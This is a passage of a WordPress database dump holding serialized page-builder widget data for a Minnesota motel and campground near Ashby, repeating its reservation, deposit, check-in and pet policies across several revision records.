DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1519,689,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1520,690,'panels_data','a:3:{s:7:\"widgets\";a:3:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:3:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1521,690,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1522,690,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1523,691,'panels_data','a:3:{s:7:\"widgets\";a:3:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:3:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1524,692,'vantage_panels_no_legacy','true'),(1525,692,'_tablepress_table_options','{\"last_editor\":3,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),(1526,692,'_tablepress_table_visibility','{\"rows\":[1,1,1,1,1,1,1,1],\"columns\":[1,1,1,1]}'),(1527,694,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:2:{s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1528,694,'panels_data','a:3:{s:7:\"widgets\";a:3:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:3:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1529,694,'panels_data','a:3:{s:7:\"widgets\";a:3:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER 